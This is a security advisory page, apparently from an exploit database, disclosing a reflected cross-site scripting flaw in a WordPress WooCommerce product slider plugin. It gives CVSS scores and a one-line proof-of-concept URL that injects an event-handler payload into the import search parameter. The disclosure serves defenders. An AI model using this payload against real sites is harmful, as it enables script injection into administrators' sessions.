WordPress Product Slider For WooCommerce 1.13.21 Cross Site Scripting

2022.02.03
Credit: 0xB9
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS) # Date: 3/16/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/ # Version: 1.13.21 # Tested on: Windows 10 # CVE: CVE-2021-24300 1. Description: This plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting. 2. Proof of Concept: wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover=alert(1);//


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top